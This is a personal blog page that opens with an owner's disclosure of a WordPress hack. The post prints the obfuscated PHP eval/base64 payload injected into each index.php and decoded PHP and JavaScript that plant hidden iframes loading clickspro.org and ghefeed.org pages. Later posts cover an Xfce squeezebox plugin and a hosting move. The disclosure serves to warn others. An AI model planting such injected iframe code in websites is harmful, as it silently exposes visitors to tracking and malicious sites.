The sorry state this page is in…

… is mostly due to the fact that it has been partially hacked. Unprotected visitors might have been tracked or redirected to malevolent sites.

I hope I have removed all hidden content and apologize for the inconvenience.

Every index.php was prefixed with the following code:

<!--?php eval(gzinflate(base64_decode('ADgGx/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZStmdlpTN3RLT1VmUTNHWmJVTW9ic3R2TWpiU2l0dC9hcWFDbXpLKzRiQjV4QVlKN1JqbzhLaDRRTHZhRk5nLzJKSC8zM2Z6TkFBVHJUODlrSll5SmN3eFBFdU8rZ0NualQ1VlZFRWdwcDN0V045NmFENWo4RU52V2E0V2p0NHpnN2UwbDBGeGcxM3oyNjc5Yk05OWEyQTg0SThzS3doeGVhemNBZWJWU3FqTWlJVXJzOHYvR0JaamFMdjJuM3Z1UythNGUrWWZwampEdGRNbjlMNm52RUxOSDloWEJJSmhJLzBLdzMyZ1F4ZTIyck5RK3JPR0dRZG4zeitRdDMzeDJkM2Y3WHdnVVBZdEFLWnNmN1F5a1p1NjVjOVlkWENEbU53eTUvQmJhQ3R5LzFCK3dmRGtBeXZDSG5jTnlMYW9VVGVYVG4wYzNFWm5XaDI0Y1Z4R0cvSWNvdEduWmdENnlwNVJ2UHdQZjdsamdUSktBVjRNajRlMmEvN0JPUERScHp2NjFjOHp0V0k0bGJIanpvYUVYNzdrT1RNS1JCR3duKzI1YjVtQXdFcjcyU3o4TEdXM3gwTG9ZWWJqOVNpZEdLaTI3MXVxaXZmRndqSzRtSzg5MXlPMEIzNUdHTmRTeHIwdlgxcXV3VCszQVBTQkV1Q0V6OG42am54cFpPRlRENEVCUGhHZW9wY1AzTmo0U3pmYkVUcGI0YmZzRUxGT04ySHlRYTZKeUtLbElBdStsY1dJWThnRE9yQlR0K01raTdCNGFObkx2bW5wTEI4RGxpQ2w4OHFLZXVlQmpHcDM1NkZCaTBFK3RLOVlIREFFN3Q2SmtmU0Zmb3hLR2JBNkg0MmJWVm0wV3gvOXdsLzQwWjNEK1dkN2g4MW5IN0V6dmJoelh0VmJ4V2M3aDhYMnB6c1BmMWY4OHRudUo4V2RYL3oyc3dJTnhDVWZ6NnJwZXBFdjJ6dk5KNSs5YnV0aWVmRzk4L1B2YnkyL1YzeC9HeDc1SjhYdlByOXo1L0NYQlA1NWZyblYwR2VQNzJxNDhQOEVBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?-->

This itself decodes into:

if (!isset($ftl))
{ 
  global $ftl;
  $ftl=1;
  error_reporting(0);
  print('</pre><iframe '
        'style="visibility: hidden; position: absolute; left: 0; top: 0;"'
        'src="nohttp://click.clickspro.org/feed/frames.php?uid=56&'
        'frames=3" width="10" height="10">');
}

And the second infection decodes into:

if (document.getElementsByTagName('body')[0])
{
  iframer();
} else {
  document.write('</pre>'
    '<iframe style="visibility: hidden; position: absolute; left: 0; top: 0;" '
    'src="nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3' 
    'width="10" height="10"></iframe></pre>');
}
function iframer()
{
  var f = document.createElement('iframe');
  f.setAttribute('src','nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

Fortunately, the attack ended here and did not succeed to do any more damage. Keeping debian and wordpress up to date appears to have shielded against anything serious.

Lessons learned: clickspro.org is a junkpit, ghefeed.org too.

Xfce 4.8 and pragha

xfce4-squeezebox-plugin update:


Consonance was supported ever since 2006 or so and is about to be replaced by pragha, available in the 4.6 branch.

Ever since xfce 4.8 was released, I was fighting with mysterious crashes when removing the plugin; rewrote it to become a .so to no avail. Now it runs, somewhat, but not yet stable. Available in the trunk.

Hopefully, the MPRIS2 patch I wrote for pragha will prove itself useful. Need to write a generic MPRIS2 backend…

Squeezebox update

squeezebox settings 2010

The settings dialog has been upgraded; dynamic attachment to running clients, real configurable media buttons…

Unfortunately, in the last year the Player’s D-Bus APIs changed somewhat so currently only Mpd appears stable.

Consonance seems to be dead. Muine too.

Hello world!

Welcome to my blog. It was about time for a change and coincidentally my provider just quit from my contract – I was plain too small for him.

With the new hosting, new techncial opportunities beyond static HTML arise as you can see by now – having all the possibilities of a linux server at your hands that is online 24/7 is a very pleasant thing for experiments and fun.